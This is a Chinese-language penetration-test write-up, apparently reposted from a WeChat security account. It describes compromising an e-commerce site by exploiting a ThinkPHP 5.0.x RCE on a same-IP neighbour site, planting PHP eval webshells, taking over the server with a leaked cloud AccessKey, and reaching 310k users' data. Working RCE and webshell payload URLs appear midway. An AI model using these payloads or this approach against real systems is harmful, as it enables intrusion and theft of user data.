声明：文中涉及到的技术和工具，仅供学习使用，禁止从事任何非法活动，如因此造成的直接或间接损失，均由使用者自行承担责任。

众亦信安，中意你啊！

背景：某日喝着科技老班章的领导走过来，丢了几个公众号给我，让我隔天交成果，话不多说直接开干。

"小坤站"打点过程

打开某电商公众号，开局就见爱坤，让我买回家炖着吃，此站就称它为“小坤站”，此处省去公众号功能点的渗透步骤。

复制链接web访问，提示需要wx访问，而后扫描了后台，看到了admin.html，拼接访问一下“小坤站”后台

报错看了一下版本信息5.0.24，掏工具梭了一波，不出意外啥也没有，后面又看了前台，爆破口令都冒得收获

这里转变思路，ping了下域名，找到同ip下不同旁站，果不其然发现另外一个站长这样。

看了下报错信息，眼前一亮 版本5.0.22，乘着工具还热乎直接梭，rce到手，小坤站没得洞我还不能搞其它站了。（该站和目标站同ip）

"小坤站"shell上传

换各种方式执行命令都执行不了。

看了下phpinfo，天杀的把能禁用的都给禁用了。

网上又找了下poc，写文件，马儿url编码，失败收场。

?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=dd.php&vars[1][]=<?phpecho system('ls');?>?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=dda.php&vars[1][]=<?php @eval($_POST['pass']);?>?s=/indexthinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=qax.php&vars[1][]=%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%70%61%73%73%27%5d%29%3b%3f%3e

然后又拿工具传马，咦不解析。

换了个小免杀马儿，上传成功，哥斯连接接冒得问题。

执行命令失败。（disable_functions禁了好多函数）

没得权限访问其它目录下文件，只能访问当前文件。（翻了下数据库配置文件找到密码连接，也没有目标站点的数据，意义不大）

转换蚁剑连接，又上传个蚁剑免杀马子。（普通马子不解析，后面发现是尖括号给转义了）

问题又随之出现了，报错 CERT_HAS_EXPIRED。

忽略https证书，还是报错。

没办法本着遇到问题解决问题的原则，加班也得解决。（累s自己，卷s同事）

参考大佬一篇文章：云天安全-乌特拉安全实验室丨解决 Ant Sword-HTTPS 证书失效（cert_has_expired）连不上问题

修改java.security配置文件，这里根据自己使用的jre版本修改，路径可去环境变量看，也可everything搜索。

最终修改成如下图所示，也可以全部置空，视情况而定，修改前记得备份原文件。

jdk.certpath.disabledAlgorithms=MD2, RSA keySize < 1024jdk.tls.disabledAlgorithms=SSLv3, RC4, DH keySize < 768

连接成功，美滋滋~

"小坤站"服务器

换不同的工具连接，访问的文件权限既然不同。（不清楚原理，只觉是玄学作怪）

果然权限不一样看到的信息就是不一样，找到目标站点命名的文件夹。

执行命令 经典的ret=127，插件绕过disable_fucition失败。

翻到阿里云的accesskey泄露，命脉泄露，成功接管”小坤站“服务器，香啊~      

"小坤站"后管

有权限访问后，随机翻了翻数据库配置文件，拿哥斯拉连接。

数据库找到后管账号，拿去cmd5解密。

成功登录电商后管，各种会员数据，订单管理等，31w用户手机号，还可改金额，截部分图挂个样。

PS：完美拿下小坤站，过程中遇到shell不解析，命令执行不了，马儿权限问题，但都花时间解决了，思路打开，收获就不会少。

原文始发于微信公众号（WK安全）：渗透测试篇-记一次小坤站渗透过程